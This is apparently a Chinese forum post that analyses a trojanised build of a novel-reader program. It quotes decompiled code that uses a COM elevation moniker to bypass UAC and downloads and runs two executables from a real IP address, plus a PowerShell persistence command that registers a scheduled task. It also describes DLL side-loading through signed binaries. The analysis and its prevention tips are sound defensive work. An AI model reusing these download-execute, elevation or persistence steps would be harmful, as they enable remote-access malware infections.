杀毒软件不应该查不出啊…
利用 explorer COM 接口提权执行可执行文件,字符串都没加密,杀毒软件理应能根据特征或行为查杀:
wcscpy(pszName, L"Elevation:Administrator!new:");
wcscpy(v3, L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
直接将 exe 放到在线沙盒运行,未能观测到下载请求,怀疑有检测。
直接静态分析,在 WinMain 结尾的地方可以看到下载文件并执行的代码:
sub_140031A50();
GetTempPathW(0x104u, temp_path);
SetCurrentDirectoryW(temp_path);
str_set_1400045C0((__int64)&base_url, (__int64)"http://154.82.68.157:810/b2ca73d9752327bd/");
str_set_1400045C0((__int64)exe_1, (__int64)"iLauncher.exe");
url1 = concat_string_140014D40(url_exe, &base_url, exe_1);
download_140031ED0((__int64)url1, exe_1);
str_free((__int64)url_exe);
str_set_1400045C0((__int64)exe_2, (__int64)"infoflow.exe");
url2 = concat_string_140014D40(url_exe, &base_url, exe_2);
download_140031ED0((__int64)url2, exe_2);
str_free((__int64)url_exe);
Sleep(3000u);
uuac();
其中 sub_140031A50
应该是检测虚拟机/沙盒,没细看。拿 WMI 查系统信息。
之后的流程就是下载两个 EXE 文件到 TEMP 目录,并执行 iLauncher.exe
:
http://154.82.68.157:810/b2ca73d9752327bd/iLauncher.exe
http://154.82.68.157:810/b2ca73d9752327bd/infoflow.exe
其中 iLauncher.exe
有合法数字签名,签名主体是 Beijing Baidu Netcom Science and Technology Co.,Ltd
,怀疑是白+黑。会间接执行命令 infoflow.exe install
。
把两个可执行文件放到沙盒用管理员权限执行 iLauncher.exe
就可以观察后续了,沙盒自动打上两个 RAT 远控标记:valleyrat
和 silverfox
(银狐)。我对这些家族不清楚,就此略过。
安装完毕后安装计划任务 StateRepositorys
,设置开机自启,并启动:
powershell.exe -NoProfile -Command "$taskName = 'StateRepositorys'; $programPath = 'C:\Program Files (x86)\vmware-vm\kcinst.exe'; $description = 'Enable StateRepositorys license acquisition'; $action = New-ScheduledTaskAction -Execute $programPath; $trigger = New-ScheduledTaskTrigger -AtLogOn; $currentUserName = [Environment]::UserName; $principal = New-ScheduledTaskPrincipal -UserId $currentUserName -LogonType Interactive -RunLevel Highest; $settings = New-ScheduledTaskSettingsSet -MultipleInstances Parallel; Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Description $description"
powershell.exe -NoProfile -Command "Start-ScheduledTask -TaskName 'StateRepositorys'"
powershell.exe -NoProfile -Command Enable-WindowsOptionalFeature -Online -FeatureName VirtualMachinePlatform -All
观察计划任务可以看到 StateRepositorys
任务:
KcInst.exe
又是一个白加黑。exe 本体有合法签名,签名主体是 KYOCERA Document Solutions Inc.
。
kcinst32.dll
和 sqlite3.dll
都没有数字签名,怀疑前者被替换了。我没看。
连接记录查询 KcInst.exe
,可以发现程序向下述 IP 进行加密通信:
预防建议:
- 放沙盒或虚拟机跑一跑。如果有比较明显的沙盒/虚拟机检测(如不让执行,或无反应),删掉。
- 看可执行文件的属性,是否与预期一致。主楼的 EXE 查看详细信息写的是 “A minimalist novel reader”,即开源项目 binbyu/Reader。
- 如果不确认来源是否安全,放虚拟机里跑。